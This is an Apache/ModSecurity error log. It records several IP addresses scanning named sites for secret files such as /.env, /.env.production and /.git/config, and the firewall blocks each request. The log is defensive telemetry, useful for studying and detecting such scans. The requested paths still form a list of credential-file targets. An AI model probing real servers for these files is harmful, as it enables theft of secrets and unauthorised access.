[Fri Nov 28 12:49:31.491656 2025] [:error] [pid 385204] [client 209.97.180.8:47584] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSmMS4JthrrJ55oRwz6kCQAAAAI"]
[Fri Nov 28 12:49:31.586626 2025] [:error] [pid 384069] [client 209.97.180.8:47592] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSmMS6dcGzopfH51_3odtwAAAAU"]
[Fri Nov 28 12:49:31.586879 2025] [:error] [pid 384069] [client 209.97.180.8:47592] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSmMS6dcGzopfH51_3odtwAAAAU"]
[Fri Nov 28 12:49:31.587053 2025] [:error] [pid 384069] [client 209.97.180.8:47592] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSmMS6dcGzopfH51_3odtwAAAAU"]
[Fri Nov 28 14:26:20.203221 2025] [:error] [pid 384077] [client 45.139.104.171:57804] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSmi_JDbtqpg1ipAjoI4dwAAAA8"]
[Fri Nov 28 14:26:20.203522 2025] [:error] [pid 384077] [client 45.139.104.171:57804] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSmi_JDbtqpg1ipAjoI4dwAAAA8"]
[Fri Nov 28 14:26:20.203689 2025] [:error] [pid 384077] [client 45.139.104.171:57804] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSmi_JDbtqpg1ipAjoI4dwAAAA8"]
[Fri Nov 28 15:28:53.820724 2025] [:error] [pid 387629] [client 34.245.11.111:54704] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSmxpT5upQdonQ7NnAka7wAAAAg"]
[Fri Nov 28 15:28:53.820762 2025] [:error] [pid 387627] [client 34.245.11.111:54714] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSmxpXNPt4gG4kNzsu9PnAAAAAY"]
[Fri Nov 28 15:28:53.820976 2025] [:error] [pid 387629] [client 34.245.11.111:54704] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSmxpT5upQdonQ7NnAka7wAAAAg"]
[Fri Nov 28 15:28:53.820984 2025] [:error] [pid 387627] [client 34.245.11.111:54714] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSmxpXNPt4gG4kNzsu9PnAAAAAY"]
[Fri Nov 28 15:28:53.821143 2025] [:error] [pid 387627] [client 34.245.11.111:54714] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSmxpXNPt4gG4kNzsu9PnAAAAAY"]
[Fri Nov 28 15:28:53.821168 2025] [:error] [pid 387629] [client 34.245.11.111:54704] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSmxpT5upQdonQ7NnAka7wAAAAg"]
[Fri Nov 28 15:28:53.822087 2025] [:error] [pid 387632] [client 34.245.11.111:54706] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSmxpSOHYOIm7-ptYskvKQAAAAw"]
[Fri Nov 28 15:28:53.822234 2025] [:error] [pid 387632] [client 34.245.11.111:54706] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSmxpSOHYOIm7-ptYskvKQAAAAw"]
[Fri Nov 28 15:28:53.823232 2025] [:error] [pid 387624] [client 34.245.11.111:54710] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSmxpbYx3gm-uDJmSIcTeAAAAAA"]
[Fri Nov 28 15:28:53.823374 2025] [:error] [pid 387624] [client 34.245.11.111:54710] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSmxpbYx3gm-uDJmSIcTeAAAAAA"]
[Fri Nov 28 15:28:53.823510 2025] [:error] [pid 387630] [client 34.245.11.111:54712] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSmxpaRmXhSJMtkKrI7iOgAAAAo"]
[Fri Nov 28 15:28:53.823529 2025] [:error] [pid 387624] [client 34.245.11.111:54710] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSmxpbYx3gm-uDJmSIcTeAAAAAA"]
[Fri Nov 28 15:28:53.823683 2025] [:error] [pid 387630] [client 34.245.11.111:54712] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSmxpaRmXhSJMtkKrI7iOgAAAAo"]
[Fri Nov 28 15:28:53.823831 2025] [:error] [pid 387630] [client 34.245.11.111:54712] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSmxpaRmXhSJMtkKrI7iOgAAAAo"]
[Fri Nov 28 15:28:53.824081 2025] [authz_core:error] [pid 383775] [client 34.245.11.111:54716] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Fri Nov 28 15:28:53.824082 2025] [authz_core:error] [pid 387628] [client 34.245.11.111:54708] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Fri Nov 28 15:28:53.824429 2025] [:error] [pid 387632] [client 34.245.11.111:54706] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSmxpSOHYOIm7-ptYskvKQAAAAw"]
[Fri Nov 28 15:28:55.009492 2025] [:error] [pid 383779] [client 34.245.11.111:54788] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSmxp1Qi9n79E5A6YeczCwAAABc"]
[Fri Nov 28 15:28:55.009712 2025] [:error] [pid 383779] [client 34.245.11.111:54788] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSmxp1Qi9n79E5A6YeczCwAAABc"]
[Fri Nov 28 15:28:55.009882 2025] [:error] [pid 383779] [client 34.245.11.111:54788] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSmxp1Qi9n79E5A6YeczCwAAABc"]
[Fri Nov 28 15:28:55.227730 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSmxp-lfIsf8iBzToT1BFwAAABg"]
[Fri Nov 28 15:28:55.227984 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSmxp-lfIsf8iBzToT1BFwAAABg"]
[Fri Nov 28 15:28:55.228610 2025] [:error] [pid 387638] [client 34.245.11.111:54792] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSmxp-lfIsf8iBzToT1BFwAAABg"]
[Fri Nov 28 15:28:55.537143 2025] [:error] [pid 387626] [client 34.245.11.111:54890] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSmxpx24EbIjO9Ay3ZANRAAAAAM"]
[Fri Nov 28 15:28:55.537362 2025] [:error] [pid 387626] [client 34.245.11.111:54890] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSmxpx24EbIjO9Ay3ZANRAAAAAM"]
[Fri Nov 28 15:28:55.537537 2025] [:error] [pid 387626] [client 34.245.11.111:54890] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSmxpx24EbIjO9Ay3ZANRAAAAAM"]
[Fri Nov 28 15:28:55.788125 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSmxp69FOLCsq7MColttAgAAAAE"]
[Fri Nov 28 15:28:55.788385 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSmxp69FOLCsq7MColttAgAAAAE"]
[Fri Nov 28 15:28:55.788598 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSmxp69FOLCsq7MColttAgAAAAE"]
[Fri Nov 28 15:28:56.221248 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSmxqEM6gFne4-slYXlYqwAAABI"]
[Fri Nov 28 15:28:56.221471 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSmxqEM6gFne4-slYXlYqwAAABI"]
[Fri Nov 28 15:28:56.221727 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSmxqEM6gFne4-slYXlYqwAAABI"]
[Fri Nov 28 15:28:56.590937 2025] [:error] [pid 387716] [client 34.245.11.111:55096] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSmxqGb3GJTUfRWpnwmd4AAAAAI"]
[Fri Nov 28 15:28:56.591207 2025] [:error] [pid 387716] [client 34.245.11.111:55096] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSmxqGb3GJTUfRWpnwmd4AAAAAI"]
[Fri Nov 28 15:28:56.591424 2025] [:error] [pid 387716] [client 34.245.11.111:55096] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSmxqGb3GJTUfRWpnwmd4AAAAAI"]
